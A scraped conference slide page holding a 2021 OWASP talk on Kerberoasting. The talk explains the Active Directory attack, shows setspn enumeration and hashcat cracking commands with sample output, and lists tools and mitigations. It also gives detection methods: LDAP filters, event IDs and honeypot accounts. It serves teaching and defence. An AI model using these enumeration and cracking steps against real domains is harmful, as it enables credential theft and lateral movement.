Kerberos Survival Guide: SharePointaloozaKerberos Survival Guide: SharePointalooza
Kerberos Survival Guide: SharePointaloozaJ.D. Wade
 
Uncloaking IP Addresses on IRC
Uncloaking IP Addresses on IRCUncloaking IP Addresses on IRC
Uncloaking IP Addresses on IRCDerek Callaway
 
SharePoint Saturday Kansas City - Kerberos Survival Guide
SharePoint Saturday Kansas City - Kerberos Survival GuideSharePoint Saturday Kansas City - Kerberos Survival Guide
SharePoint Saturday Kansas City - Kerberos Survival GuideJ.D. Wade
 
Adopting Modern SSL / TLS
Adopting Modern SSL / TLSAdopting Modern SSL / TLS
Adopting Modern SSL / TLSAvi Networks
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Shakacon
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATANikhil Mittal
 

Similar to In the Wake of Kerberoast (20)

SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting Revisisted
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseDEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
 
SPS Ozarks 2012: Kerberos Survival Guide
SPS Ozarks 2012: Kerberos Survival GuideSPS Ozarks 2012: Kerberos Survival Guide
SPS Ozarks 2012: Kerberos Survival Guide
 
Null talk
Null talkNull talk
Null talk
 
Kerberos survival guide
Kerberos survival guideKerberos survival guide
Kerberos survival guide
 
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOSWalking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS
 
Kerberos survival guide-STL 2015
Kerberos survival guide-STL 2015Kerberos survival guide-STL 2015
Kerberos survival guide-STL 2015
 
Kerberos Survival Guide - St. Louis Day of .Net
Kerberos Survival Guide - St. Louis Day of .NetKerberos Survival Guide - St. Louis Day of .Net
Kerberos Survival Guide - St. Louis Day of .Net
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]
 
Kerberos Survival Guide: SharePoint Saturday Nashville 2015
Kerberos Survival Guide: SharePoint Saturday Nashville 2015Kerberos Survival Guide: SharePoint Saturday Nashville 2015
Kerberos Survival Guide: SharePoint Saturday Nashville 2015
 
Wireless LAN Security Fundamentals
Wireless LAN Security FundamentalsWireless LAN Security Fundamentals
Wireless LAN Security Fundamentals
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Kerberos Survival Guide: Columbus 2015
Kerberos Survival Guide: Columbus 2015Kerberos Survival Guide: Columbus 2015
Kerberos Survival Guide: Columbus 2015
 
Kerberos Survival Guide: SharePointalooza
Kerberos Survival Guide: SharePointaloozaKerberos Survival Guide: SharePointalooza
Kerberos Survival Guide: SharePointalooza
 
Uncloaking IP Addresses on IRC
Uncloaking IP Addresses on IRCUncloaking IP Addresses on IRC
Uncloaking IP Addresses on IRC
 
SharePoint Saturday Kansas City - Kerberos Survival Guide
SharePoint Saturday Kansas City - Kerberos Survival GuideSharePoint Saturday Kansas City - Kerberos Survival Guide
SharePoint Saturday Kansas City - Kerberos Survival Guide
 
Adopting Modern SSL / TLS
Adopting Modern SSL / TLSAdopting Modern SSL / TLS
Adopting Modern SSL / TLS
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
 

Recently uploaded

Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomCzechDreamin
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
 
IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoTAnalytics
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Product School
 
UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2DianaGray10
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...Product School
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeCzechDreamin
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesBhaskar Mitra
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...Product School
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...Product School
 
In-Depth Performance Testing Guide for IT Professionals
In-Depth Performance Testing Guide for IT ProfessionalsIn-Depth Performance Testing Guide for IT Professionals
In-Depth Performance Testing Guide for IT ProfessionalsExpeed Software
 
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka Doktorová10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka DoktorováCzechDreamin
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutesconfluent
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxDavid Michel
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...Product School
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Julian Hyde
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesThousandEyes
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
 

Recently uploaded (20)

Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
In-Depth Performance Testing Guide for IT Professionals
In-Depth Performance Testing Guide for IT ProfessionalsIn-Depth Performance Testing Guide for IT Professionals
In-Depth Performance Testing Guide for IT Professionals
 
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka Doktorová10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutes
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 

In the Wake of Kerberoast

  • 1. In the Wake of Kerberoast Ken Kitahara 2021/12/08 @ OWASP Sendai
  • 2. Background • In Active Directory Network Penetration Testing, password issues are serious problem. • Attackers and Penetration Testers want to get credentials: • Local Privilege Escalation • Lateral Movement • Domain Escalation • Attackers and Penetration Testers don't want to do online password cracking if not required: • Online password cracking is very noisy and increase likelihood of detection. • How can we get password hashes for offline cracking?
  • 3. Advent of Kerberoast [Ref.] Attacking Kerberos - Kicking the Guard Dog of Hades • https://redsiege.com/kerberoast-slides (Slide) • https://www.youtube.com/watch?v=PUyhlN-E5MU (Video) • Presented by Tim Medin (@TimMedin) at SANS HackFest 2014. • Method to retrieve password hash for offline crack and to forge tickets. • Local Administrator privilege is not required :)
  • 4. Kerberos Authentication Flow Domain Controller Application Server Client Computer (2) AS-REP (AS Reply) : The DC sends TGT for the requested user account to the client. TGT (1) AS-REQ (AS Request) : The client requests a TGT (Ticket Granting Ticket) for the user account to AS (Authentication Service) on the DC (Domain Controller).
  • 5. Kerberos Authentication Flow Domain Controller Application Server Client Computer TGT ST (4) TGS-REP (TGS Reply) : The TGS on DC sends a ST for the requested service to the client. (3) TGS-REQ (TGS Request) : The client sends TGT and requests a ST (Service Ticket) for the application server to the TGS (Ticket Granting Service) on DC.
  • 6. Kerberos Authentication Flow Domain Controller Application Server Client Computer (5) AP-REQ (Application Request) : The client sends ST and request authentication from the service on the application server. ST (6) AP-REP (Application Reply) : The server authenticates the client and grants access to the service.
  • 7. Kerberos Tickets ❑ TGT (Ticket Granting Ticket) • Issued by AS (Authentication Service) in KDC (Key Distribution Center) on DC (Domain Controller). • Use to issue ST (Service Ticket). • Data is encrypted with hash value of krbtgt account. ❑ ST (Service Ticket) • Issued by TGS (Ticket Granting Service). • Use to authenticate service (File Server, Web Server, SQL Server, etc...) • Data is encrypted with hash value of service account. • To issue ST, client must be present TGT from AS. • [NOTE] In many security articles, TGS is used as a word to mean ST.
  • 8. Data in The Tickets TGT / ST Username Session Key Expiration Time PAC (Optional) A ticket is encrypted with a key generated from a hash value: ❑ TGT • The key is derived from krbtgt account's NTLM hash. • krbtgt's NTLM is uncrackable :( ❑ ST • The key is derived from service owner account's NTLM hash. • If the service owner is Computer Account, NTLM is uncrackable :( • But what if the service owner is some domain account?
  • 9. Kerberoast Overview Domain Controller Application Server Client Computer TGT ST $krb5tgs$23$*sqlsvc$co ntoso.local$MSSQLSvc/S QL01.contoso.local:143 3@contoso.local*$BB513 E29A412927A81C68973A0E E38F7$5B3C8A9497F374DC 9B21C70AB65E36D9...... Crack! TGS-REQ TGS-REP
  • 10. Original Workflow for Kerberoast 1. An attacker authenticated as a domain user requests TGT to AS and gets TGT. 2. The attacker requests ST for target service to TGS and gets the ST. 3. Attacker extracts tickets from memory as file. 4. The attacker extracts a hash value from ST file. 5. The attacker cracks the hash value and gets plain text password. 6. [Optional] After cracking the password, we can forge ticket owner in the ST.
  • 11. Requirements for Kerberoast • Authenticated as a domain user account. • A domain user account is set as a service account. • Target service is registered as a valid service to Kerberos server. • [Optional] For fast offline password cracking, it is preferable to use RC4 as the ticket encryption algorithm. • Kerberoast doesn't need to communicate with the target service. So, not required target server accessibility, availability and existence :)
  • 12. Encryption Algorithms • Tickets are encrypted with RC4, AES128 or AES256. • User's NTLM hash is used as the encryption key. • If the ticket uses AES128 or AES256 as the encryption algorithm, a salt based on the account name is used. Account Type Format Example User Account <Domain's FQDN in Upper Case><Account Name in Lower Case> The salt for jeff@contoso.local is CONTOSO.LOCALjeff Computer Account <Domain's FQDN in Upper Case>host<Account Name in Lower Case> The salt for pc01.contoso.local is CONTOSO.LOCALhostpc01.co ntoso.local
  • 13. Enumeration • Services are managed by SPN (Service Principal Name). • SPN is a key component of Kerberos authentication for realizing Single Sign-On. • Kerberos server (DC) verifies services with the SPN. • An SPN consists of service name, computer name, domain's FQDN, port number, service account name...... • Attackers can find targets for Kerberoast by enumerating SPN records. • Find SPNs with a domain user account set as the owner of the service. • SPNs can enumerate with setspn.exe command. It uses LDAP query. • Direct LDAP search can be also used for finding targets. MSSQLSvc/dbsrv.domain.local:1433/CN=dbadmin,OU=SrvAdms,DC=domain,DC=local
  • 14. Enumeration : setspn.exe C:>setspn -T contoso.local -Q */* Checking domain DC=contoso,DC=local --snip-- CN=CL01,CN=Computers,DC=contoso,DC=local RestrictedKrbHost/CL01 HOST/CL01 --snip-- CN=sqlsvc,CN=Users,DC=contoso,DC=local MSSQLSvc/SQL01.contoso.local:1433 Existing SPN found! This SPN record indicates: • Domain user account contososqlsvc manages SQL Server on SQL01.contoso.local. • Attackers can retrieve Kerberos format hash from ST.
  • 19. Password Crack Tool's Support • John the Ripper is added support for KRB5TGS format in September 2015. • Hashcat is added support for KRB5TGS format in February 2016.
  • 20. Invoke-Kerberoast • If possible, attackers and Penetration Testers don't want to create files. • Will Schroeder (@harmj0y) released Invoke-Kerberoast in November 2016. • It is a PowerShell Script and can retrieve KRG5TGS format hash without creating ticket file.
  • 21. Tools for Kerberoast Tool Description kerberoast • Original tools for Kerberoast by Tim Medin. • Python Scripts. • Service Tickets need to be output as files. • Can also extract Service Tickets from pcap files. Invoke-Kerberoast • PowerShell script by Will Schroeder. • All operations can be executed in memory. Rubeus • C# toolset for Kerberos-related attacks by Will Schroeder. • The tool that is probably the most used today in Kerberos-related attacks.
  • 22. Real World Cases • APT29 (a cyber espionage group with alleged ties to Russia) obtained Service Ticket for Kerberoast. • FIN7 (a financially-motivated threat group) used Kerberoast for credential access. • Operation Wacao (a China-based cyber espionage adversary) used Invoke- Kerberoast to request encrypted Service Tickets. • Wizard Spider (a Russia-based financially-motivated threat group) used Rubeus, Mimikatz and Invoke-Kerberoast for credential access. [Ref.] MITRE ATT&CK - Steal or Forge Kerberos Tickets: Kerberoasting • https://attack.mitre.org/techniques/T1558/003/
  • 23. Mitigation • Ensure strong password length (ideally 25+ characters) and complexity for service accounts : Mitigation for offline password cracking. Strong passwords make it difficult to crack passwords in a realistic amount of time. • Enable Kerberos encryption, stronger than RC4, and update DC to Windows Server 2019 or newer version : Mitigation for offline password cracking. Strong encryption methods make slower the speed of offline password cracking. • Limit service account privilege : This is a mitigation for lateral movement.
  • 24. Encryption Method in Kerberos etype Encryption Type 16 (0x10) des3-cbc-sha-1 17 (0x11) aes128-cts-hmac-sha1-96 18 (0x12) aes256-cts-hmac-sha1-96 19 (0x13) aes128-cts-hmac-sha384-192 20 (0x14) aes256-cts-hmac-sha384-192 23 (0x17) rc4-hmac / rc4-hmac-md5 • Kerberos supports many encryption methods for encrypting data in tickets. • In Active Directory, the default encryption method is rc4-hmac (etype = 23)
  • 25. Enable Strong Encryption Method • AES128 / AES256 can be enabled with following procedure in DC: 1. Open [Active Directory Users and Computers] 2. Open Properties for the service account. 3. In [Account] tab, check following lines in [Account options] section: • This account supports Kerberos AES128 bit encryption. • This account supports Kerberos AES256 bit encryption. • This mitigation can be bypassed if DC is prior to Windows Server 2019, but it is useful for detection.
  • 26. Speed Measurement (RC4) ┌──(kali㉿kali)-[~] └─$ hashcat -m 13100 -r nsa-rules/nsa64.rule sqlsvc-rc4.txt rockyou.txt --snip-- $krb5tgs$23$*sqlsvc$contoso.local$MSSQLSvc --snip-- 510ff11:Password123! Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 23, TGS-REP Hash.Target......: $krb5tgs$23$*sqlsvc$contoso.local$MSSQLSvc/SQL01.co...10ff11 Time.Started.....: Tue Dec 7 06:12:39 2021 (2 secs) Time.Estimated...: Tue Dec 7 06:12:41 2021 (0 secs) OS : Kali Linux on VMware (Number of CPU : 2, Number of Core : 1, RAM: 2GB) Password Dictionary : rockyou.txt Rule : nsa-rules/nsa64.rule
  • 27. Speed Measurement (AES256) ┌──(kali㉿kali)-[~] └─$ hashcat -m 19700 -r nsa-rules/nsa64.rule sqlsvc-aes256.txt rockyou.txt --snip-- $krb5tgs$18$sqlsvc$contoso.local$9aa3fdc96 --snip-- a793c4f:Password123! Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 18, TGS-REP Hash.Target......: $krb5tgs$18$sqlsvc$contoso.local$9aa3fdc96a0caeb244...793c4f Time.Started.....: Tue Dec 7 06:14:13 2021 (7 mins, 48 secs) Time.Estimated...: Tue Dec 7 06:22:01 2021 (0 secs) OS : Kali Linux on VMware (Number of CPU : 2, Number of Core : 1, RAM: 2GB) Password Dictionary : rockyou.txt Rule : nsa-rules/nsa64.rule
  • 28. Detection : Enumeration Tool Common LDAP Filter setspn.exe (servicePrincipalName=*/*) Invoke-Kerberoast (&(samAccountType=805306368)(servicePrincipalName=*)) Rubeus (&(samAccountType=805306368)(serviceprincipalname=*)(! samAccountName=krbtgt)(|(!msds- supportedencryptiontypes=*)(msds- supportedencryptiontypes=0)(msds- supportedencryptiontypes:1.2.840.113556.1.4.803:=4))) • Most of tools for Kerberoast, enumerate target with LDAP query. • LDAP filter servicePrincipalName=* is not usually considered to occur, so this would be a good indicator for hunting Kerberoast. • This detection can be bypassed, but it is a good way to prevent script kiddies.
  • 29. Detection : Enumeration • LDAP query logging is not enabled by default. • To enable LDAP query logging, set HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNTDSDiagnostics 15 Field Engineering registry key to a value 1 between 5. The larger the number, the higher the level of detail. • After setting the registry, LDAP query should be appeared as ID 1644 in Directory Service under Applications and Services Logs from Event Viewer.
  • 30. Detection : Enumeration Logging threshold value should be optimized. It is controlled by registry values under HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNTDSParameters. If don't set it, default value is applied: ❑ Expensive Search Results Threshold DWORD. Default value is 10,000. Log when more entries than this value are retrieved. ❑ Inefficient Search Results Threshold DWORD. Default value is 1,000. Log when more entries than this value are searched and fewer than 10 % of the results are returned. ❑ Search Time Threshold (msecs) DWORD. Default value is 30,000. Log any operation that exceeds this value (in milliseconds).
  • 31. Detection : Enumeration This example is generated by Rubeus.exe: ❑ (sAMAccountType=805306368) Listing all User objects. ❑ (servicePrincipalName=*) Listing all objects have SPN. ❑ (!(sAMAccountName=krbtgt)) Exclude krbtgt user account. ❑ (!(userAccountControl&2)) Exclude disabled user.
  • 32. Detection : Ticket Request • TGS-REQ raises an event with ID 4769 in the Security under Windows Logs. • If the number of application services is large, Kerberoast tools generate the number of TGS-REQs in short time, so this can be a good indicator. • However, in general, a large number of TGS-REQs are generated :(
  • 33. Detection : Honeypot Service • TGS-REQs are always generated in domain network, so it may be hard to find which is the attacker's request. • [A Solution] Setup Honeypot Account and Honeypot Service. • Configure fake service account and fake SPN. • If attackers send TGS-REQ to the Honey Service, the attacker's intrusion can be detected.
  • 34. Detection : Encryption Type • In TGS-REQ for Kerberoasting, attackers will try to downgrade attack for fast offline cracking. • If strong encryption methods rather than RC4 is configured, Ticket Encryption Type field in event logs can be used for detecting attacker's activities. 0x17 (= 23, rc4-hmac) indicates rc4- hmac were used, and the attacker performed downgrade attack.
  • 35. Summary • Kerberoast is the technique to get password hash for offline crack. • To mitigate the attacks, ensuring strong password, enabling strong encryption algorithms and restricting privileges for service accounts. • Methods such as LDAP query logging and Honeypot service is useful for attacker's activity detection.